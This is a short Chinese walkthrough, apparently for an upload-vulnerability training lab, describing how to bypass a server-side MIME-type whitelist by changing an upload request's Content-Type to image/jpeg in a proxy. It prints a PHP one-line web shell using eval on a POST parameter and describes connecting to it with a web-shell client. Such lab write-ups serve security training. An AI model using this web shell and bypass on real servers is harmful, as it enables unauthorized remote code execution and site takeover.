第二关在后端设置了白名单,只允许上传 MINI类型 为图片的文件 , 我们通过代理工具修改其Content-Type即可
准备一个 2.php 文件 , 文件内容为一句话木马
<?php eval($_POST[-7]);?>上传 2.php 文件 , 并使用代理拦截请求
修改 Content-Type 值为 image/jpeg (图片类型) , 并转发请求
右键复制图片路径
使用菜刀链接
链接成功
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118420451